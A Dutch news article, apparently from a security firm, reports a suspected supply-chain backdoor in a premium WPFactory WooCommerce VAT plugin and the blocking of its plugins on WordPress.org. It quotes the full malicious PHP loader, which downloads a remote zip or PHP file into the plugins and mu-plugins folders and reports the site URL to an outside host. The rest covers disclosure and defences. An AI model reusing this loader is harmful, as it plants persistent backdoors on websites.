Beveiligingslek bij WPFactory: 170.000 WordPress-sites blootgesteld

| Nieuws |

WordPress blijft het meest gebruikte contentmanagementsysteem ter wereld en drijft meer dan 40 procent van alle websites op het internet aan. Van websites voor kleine bedrijven en persoonlijke blogs tot grote bedrijfsplatforms en e-commerce-infrastructuren, het CMS is de ruggengraat van het moderne web geworden. De populariteit ervan is te danken aan de flexibiliteit, het open ecosysteem en het enorme aantal plugins dat beschikbaar is om de functionaliteit uit te breiden.

Echter, hetzelfde ecosysteem is ook een van de grootste beveiligingsuitdagingen van WordPress geworden.

Bij Ferber Enterprises houdt ons cyberbeveiligingsteam voortdurend toezicht op bedreigingen voor het WordPress-ecosysteem, omdat kwetsbaarheden in plug-ins, thema’s of toeleveringsketens snel kunnen uitgroeien tot grootschalige inbreuken die wereldwijd duizenden websites treffen. De afgelopen jaren richten aanvallers zich steeds vaker op ontwikkelaars van plug-ins en distributie-infrastructuren in plaats van op individuele websites, waardoor kwaadaardige code zich via betrouwbare software-updates en officiële downloadkanalen kan verspreiden.

Deze week ontstond er een grote controverse rond WPFactory, een bekende ontwikkelaar van WordPress-plugins wiens producten wereldwijd op meer dan 170.000 websites zijn geïnstalleerd. Meer dan 80 plugins van dit bedrijf werden tijdelijk geblokkeerd op WordPress.org nadat ons cyberbeveiligingsteam bij Ferber Enterprises een vermoedelijke achterdeur had ontdekt in de premiumversie van een van hun plugins.

Het incident heeft ernstige zorgen gewekt binnen de WordPress-gemeenschap over de beveiliging van software-toeleveringsketens, de processen voor het beoordelen van plug-ins en de toenemende verfijning van aanvallen gericht op het open-source ecosysteem.

De ontdekking van het verdachte plugin-gedrag

Het probleem kwam voor het eerst aan het licht toen ons cyberbeveiligingsteam bij Ferber Enterprises afwijkend gedrag constateerde tijdens het testen van de premiumversie van de plug-in „EU VAT for WooCommerce Pro“, die rechtstreeks via hun officiële website wordt aangeboden.

In eerste instantie begon het onderzoek nadat de plugin een fatale fout genereerde tijdens de installatie. Tijdens het oplossen van het probleem identificeerden onze analisten een verdacht PHP-bestand met de naam class-alg-wc-eu-vat-customer.php. Het bestand leek gedrag te vertonen dat volledig in tegenspraak was met de verwachte functionaliteit van een WooCommerce BTW-plugin.

class-alg-wc-eu-vat-customer.php 
<?php
require_once dirname(__FILE__, 5) . '/wp-load.php';
$h = strtolower(preg_replace('/:\d+$/', '', $_SERVER['HTTP_HOST'] ?? ''));
$s = (!empty($_SERVER['HTTPS']) && $_SERVER['HTTPS'] !== 'off') ? 'https' : 'http';
$ch = curl_init("$s://$h/wp-content/plugins/eu-vat-for-woocommerce-pro/eu-vat-for-woocommerce-pro.php");
curl_setopt_array($ch, [
    CURLOPT_NOBODY => 1,
    CURLOPT_RETURNTRANSFER => 1,
    CURLOPT_TIMEOUT => 10,
    CURLOPT_SSL_VERIFYPEER => 0
]);
curl_exec($ch);
$code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
curl_close($ch);
if ($code !== 403 || ($_GET['scaramooch'] ?? '') === 'refresh') {
    $url = 'https://foodylicious.co.uk/change/akismet-pro.zip';
    $zipPath = sys_get_temp_dir() . '/plugin.zip';
    $zipData = file_get_contents($url);
    if ($zipData === false) {
        exit('Download failed');
    }
    file_put_contents($zipPath, $zipData);
    $zip = new ZipArchive;
    if ($zip->open($zipPath) === TRUE) {
        $zip->extractTo(dirname(__FILE__, 5) . '/wp-content/plugins/');
        $zip->close();
    } else {
        exit('ZIP open failed');
    }
    unlink($zipPath);
} else {
    $url = "https://foodylicious.co.uk/change/scara.php";
    $code = file_get_contents($url);
    if ($code !== false) {

        $baseDir = dirname(__FILE__, 4);

        $folderName = 'mu-plugins';

        $dir = $baseDir . '/' . $folderName;

        if (!is_dir($dir)) {
            mkdir($dir, 0755, true);
        }

        file_put_contents($dir . '/wp-redis.php', $code);
    }
}
$data = [
    'site_url' => get_site_url() . '/wp-content/plugins/eu-vat-for-woocommerce-pro/',
];
wp_remote_post('https://foodylicious.co.uk/change/tracks.php', [
    'body' => $data,
    'timeout' => 10,
]);

Volgens onze analyse probeerde de code:

  • Download een extern ZIP-archief van een externe server
  • WordPress kernmappen aanpassen
  • Communiceren met externe infrastructuur
  • Potentieel externe payloads uitvoeren op getroffen websites

Deze indicatoren wezen onmiddellijk op de mogelijke aanwezigheid van een verborgen backdoor of een kwaadaardige supply-chain compromis.

Wat de situatie bijzonder zorgwekkend maakte, was dat de plug-in niet afkomstig was van een onofficiële mirror of een illegale repository. Het pakket was rechtstreeks gedownload via het officiële klantenportaal van WPFactory, wat de vrees versterkte dat het distributiekanaal zelf mogelijk was gehackt.

Bij Ferber Enterprises hebben we het incident onmiddellijk vastgelegd en een procedure voor verantwoorde melding in gang gezet door rechtstreeks via GitHub contact op te nemen met WPFactory.

Eerste reactie van WPFactory

WPFactory reageerde aanvankelijk met de mededeling dat het verdachte bestand en het verdachte gedrag die in het rapport werden beschreven, geen deel uitmaakten van hun officiële codebase.

Een vertegenwoordiger van het bedrijf suggereerde verschillende alternatieve verklaringen, waaronder:

  • Een aangepaste lokale installatie
  • Een gecompromitteerde websiteomgeving
  • Een verouderde plugin
  • Een potentieel gemanipuleerde downloadbron

Het bedrijf verklaarde ook dat ze het verstrekte ZIP-bestand niet veilig konden inspecteren omdat hun browser het archief als potentieel onveilig markeerde.

Ons cyberbeveiligingsteam heeft vervolgens verduidelijkt dat de plug-in rechtstreeks van de officiële website van WPFactory was gedownload en dat het verdachte bestand aanwezig bleef, zelfs nadat er een nieuwe versie 4.6.1 van dezelfde bron was gedownload.

Dit detail kwam centraal te staan in het onderzoek. Als meerdere onafhankelijke downloads via het officiële distributiekanaal telkens dezelfde verdachte code bevatten, werd de kans dat een lokale website was gehackt steeds onwaarschijnlijker. Ondanks deze bevindingen verklaarde WPFactory aanvankelijk dat ze het probleem aan hun kant niet konden reproduceren en beweerden ze dat het verdachte bestand niet in het officiële plug-inpakket voorkwam.

Het bedrijf verzocht vervolgens om beheerders- en FTP-toegang tot de getroffen omgeving om het onderzoek voort te zetten. Bij Ferber Enterprises hebben we dit verzoek afgewezen om redenen van cyberbeveiliging. Het verlenen van bevoorrechte servertoegang aan een leverancier wiens infrastructuur mogelijk zelf was gecompromitteerd, zou een onaanvaardbaar veiligheidsrisico hebben gevormd. In plaats daarvan bleef ons team technisch bewijsmateriaal aanleveren, waaronder een videodemonstratie waarin het verdachte gedrag van de plug-in direct na de installatie te zien was.

Escalatie naar WordPress.org

Naarmate het onderzoek vorderde, nam de bezorgdheid toe over de mogelijke omvang van het probleem. WPFactory beschikt over een uitgebreid portfolio van meer dan 65 plug-ins, met in totaal meer dan 170.000 actieve installaties. Een inbreuk op de distributie-infrastructuur van het bedrijf zou dan ook verstrekkende gevolgen kunnen hebben voor het hele WordPress-ecosysteem.

Ons team heeft het probleem rechtstreeks aan WordPress.org gemeld om te voorkomen dat nog meer gebruikers mogelijk gecompromitteerde pakketten zouden installeren terwijl het onderzoek nog gaande was. WordPress.org heeft vervolgens de uitzonderlijke maatregel genomen om meer dan 80 WPFactory-plugins tijdelijk uit de officiële repository te verwijderen.

Deze stap trok onmiddellijk de aandacht van de hele WordPress-beveiligingsgemeenschap, omdat het op deze schaal vrij zeldzaam is dat plug-ins massaal worden geblokkeerd en dit doorgaans wijst op ernstige, onopgeloste problemen. Na de escalatie gaf WPFactory later toe dat het probleem inderdaad reëel leek en bood het bedrijf zijn excuses aan voor het feit dat het niet sneller had gereageerd op de eerste melding. Vertegenwoordigers van het bedrijf verklaarden dat ze de zaak actief onderzochten en werkten aan een oplossing. Een hypothese die intern door WPFactory naar voren werd gebracht, suggereerde dat een verouderd of in de cache opgeslagen plug-inpakket mogelijk onbedoeld via hun infrastructuur was aangeboden.

Ons cybersecurityteam was het echter niet eens met deze beoordeling. Het waargenomen gedrag wees sterk op een dieperliggend beveiligingsprobleem, mogelijk met gecompromitteerde build-pipelines, distributiesystemen of ongeautoriseerde code-injectie in downloadbare plugin-archieven.

Waarom dit incident ertoe doet

De WPFactory-controverse brengt een groeiende cyberbeveiligingsdreiging aan het licht die bekendstaat als een aanval op de softwaretoeleveringsketen. Vroeger richtten aanvallers zich vooral op het direct compromitteren van individuele websites via brute-force-aanvallen of kwetsbaarheden in plug-ins. Tegenwoordig richten cybercriminelen zich steeds vaker op de softwareleveranciers zelf, omdat het compromitteren van een vertrouwde leverancier ervoor zorgt dat kwaadaardige code zich tegelijkertijd naar duizenden websites kan verspreiden.

Deze strategie is al waargenomen in verschillende spraakmakende cybersecurity-incidenten die de afgelopen tien jaar de mondiale software-ecosystemen hebben getroffen. Specifiek binnen het WordPress-ecosysteem vormen plugin-ontwikkelaars aantrekkelijke doelwitten, omdat plugins vanzelfsprekend worden vertrouwd door beheerders en vaak met verhoogde rechten opereren.

Als er kwaadaardige code wordt ingebracht in een plug-inpakket dat via een officieel kanaal wordt verspreid, kunnen getroffen websites onbewust zelf malware installeren. In het geval van de verdachte WPFactory-plug-in zijn de mogelijke gevolgen ernstig.

Op basis van onze analyse zou het geïdentificeerde gedrag aanvallers theoretisch in staat stellen om:

  • Extra malware implementeren
  • Injecteer SEO spam
  • Maak persistente backdoors
  • Gevoelige gegevens exfiltreren
  • WordPress-installaties op afstand wijzigen
  • Ongeautoriseerde toegang over langere perioden behouden

Het gevaar van dergelijke aanvallen schuilt in hun sluwheid. Moderne backdoors zijn vaak zo ontworpen dat ze maandenlang slapend blijven voordat ze actief worden, wat de detectie aanzienlijk bemoeilijkt. Eerder deze maand heeft het WordPress Plugins Team naar verluidt meer dan 30 plugins gesloten nadat verborgen kwaadaardige code, ingebed in een ander pluginportfolio, ongeveer acht maanden inactief bleef voordat het uiteindelijk actief werd en SEO-spam op websites injecteerde.

Deze trend toont aan hoe aanvallers steeds meer prioriteit geven aan persistentie en vertraagde activering om detectiemechanismen te omzeilen.

Een bredere beveiligingscrisis in het WordPress-ecosysteem

Het WPFactory-incident legt ook bredere, structurele beveiligingsproblemen bloot die WordPress in zijn geheel raken. Het ecosysteem van plug-ins is de afgelopen tien jaar enorm gegroeid, met tienduizenden plug-ins die zowel op officiële als commerciële marktplaatsen beschikbaar zijn. Hoewel dit ecosysteem innovatie en flexibiliteit stimuleert, zorgt het ook voor een enorme complexiteit bij het toezicht op de beveiliging.

Volgens het rapport “State of WordPress Security in 2026” van Patchstack werd bijna 46% van de bekende kwetsbaarheden niet gepatcht voordat ze openbaar werden gemaakt. Dit cijfer weerspiegelt de toenemende druk op zowel plug-inontwikkelaars, beveiligingsonderzoekers als beheerders van repositories.

Tegelijkertijd bedraagt de officiële wachtrij voor WordPress pluginrecensies naar verluidt nu meer dan 4.000 plugins die wachten op beoordeling. Dergelijke aantallen illustreren de immense uitdaging van het handhaven van kwaliteitsborging en veiligheidsauditing op schaal.

Veel ontwikkelaars van plug-ins zijn kleine teams met beperkte middelen op het gebied van beveiliging. Anderen beheren tientallen plug-ins tegelijk en voeren daarbij een agressieve commerciële groeistrategie met overnames en uitbreiding van hun portfolio. WPFactory is zelf onlangs gegroeid door overnames, waaronder de aankoop van Extend-WP en zijn 19 plug-ins in 2025, gevolgd door de overname van WBW en diverse andere plug-ins later dat jaar.

Snelle portfolio-uitbreiding kan operationele complexiteit creëren die de audit van code, infrastructuurbeheer en verificatie van de integriteit van releases bemoeilijkt. Aanvallers zijn zich terdege bewust van deze realiteiten. Steeds vaker richten ze zich op het uitbuiten van zwakke operationele beveiligingspraktijken binnen softwareleveranciers, in plaats van zich rechtstreeks op eindgebruikers te richten.

Het groeiende belang van supply-chain beveiliging

Incidenten zoals deze onderstrepen de dringende behoefte aan sterkere praktijken voor leveringsketenbeveiliging binnen het hele WordPress-ecosysteem.

Bij Ferber Enterprises raadt ons cyberbeveiligingsteam plug-inontwikkelaars ten zeerste aan om een aantal belangrijke beveiligingsmaatregelen te nemen, waaronder:

  • Cryptografische pakketsignering
  • Beveiligde CI/CD-pipelines
  • Verplichte multifactorauthenticatie
  • Infrastructuursegmentatie
  • Continue integriteitsbewaking
  • Onafhankelijke codeaudits
  • Reproduceerbare buildsystemen

Websitebeheerders moeten ook hun eigen beveiligingspositie versterken. Zelfs plug-ins die van officiële of vertrouwde bronnen zijn gedownload, mogen niet als vanzelfsprekend veilig worden beschouwd.

Organisaties die kritieke WordPress-infrastructuren beheren, moeten rekening houden met:

  • Het onderhouden van stagingomgevingen
  • Uitgaand verkeer controleren
  • Plugins scannen voor implementatie
  • Gebruik van plugins beperken
  • Toepassen van least-privilege toegangscontroles
  • Implementeren van bestandsintegriteitsbewaking
  • Beheerde Web Application Firewalls (WAF's) gebruiken

In bedrijfsomgevingen wordt supply-chainvalidatie net zo belangrijk als traditioneel kwetsbaarheidsbeheer. De aanname dat officiële softwarekanalen altijd veilig zijn, is in het huidige dreigingslandschap niet langer realistisch.

Reacties vanuit de gemeenschap en lopend onderzoek

De controverse verspreidde zich snel in de WordPress-gemeenschap nadat ontwikkelaars, beveiligingsonderzoekers en infrastructuuraanbieders het probleem publiekelijk begonnen te bespreken.

Verschillende bekende figuren binnen het ecosysteem vergrootten de bekendheid van de situatie, waaronder ontwikkelaars die lijsten publiceerden van tijdelijk gesloten plugins en beheerders aanmoedigden om hun omgevingen te controleren.

Ondertussen blijft ons team bij Ferber Enterprises de verdachte plug-in-voorbeelden analyseren en alert zijn op verdere tekenen van een inbreuk die wereldwijd gevolgen kunnen hebben voor WordPress-websites.

Op het moment van publicatie heeft WPFactory het probleem erkend en verklaard dat het actief werkt aan een oplossing.

Desondanks blijven er veel vragen onbeantwoord:

  • Is de officiële distributie-infrastructuur gecompromitteerd?
  • Hoe lang werden kwaadaardige pakketten potentieel verspreid?
  • Werden er aanvullende plug-ins beïnvloed?
  • Zijn klantaccounts of downloadsysteem gehackt?
  • Kregen aanvallers persistente toegang tot interne infrastructuur?
  • Zouden er nog aanvullende slapende ladingen kunnen bestaan?

Tot deze vragen volledig zijn opgelost, blijft voorzichtigheid essentieel.

De Toekomst van WordPress Beveiliging

Het WPFactory-incident zou uiteindelijk wel eens een nieuw treffend voorbeeld kunnen worden van de uitdagingen op het gebied van cyberbeveiliging waarmee het open-source web-ecosysteem te maken heeft.

WordPress drijft een enorm deel van de wereldwijde interneteconomie aan. Elke grootschalige compromis waarbij pluginontwikkelaars betrokken zijn, kan daarom gevolgen hebben die veel verder reiken dan individuele websites.

Nu aanvallers zich steeds meer richten op het misbruiken van de toeleveringsketen en op technieken om onopgemerkt aanwezig te blijven, kan de beveiliging van plug-ins niet langer als een bijzaak worden beschouwd. Bij Ferber Enterprises zijn we van mening dat dit incident een belangrijke herinnering is dat cyberbeveiliging niet alleen draait om het beveiligen van websites zelf, maar ook om het beveiligen van elke schakel in de softwaredistributieketen.

Vertrouwen in open ecosystemen is afhankelijk van transparantie, snelle incident respons en sterke operationele beveiligingspraktijken. Het WordPress ecosysteem staat nu voor een belangrijk moment.

Hoe ontwikkelaars, repositorybeheerders, hostingproviders en beveiligingsteams reageren op dit soort incidenten, zal bepalen of WordPress het vertrouwen kan blijven behouden van de miljoenen bedrijven en organisaties die er dagelijks op vertrouwen.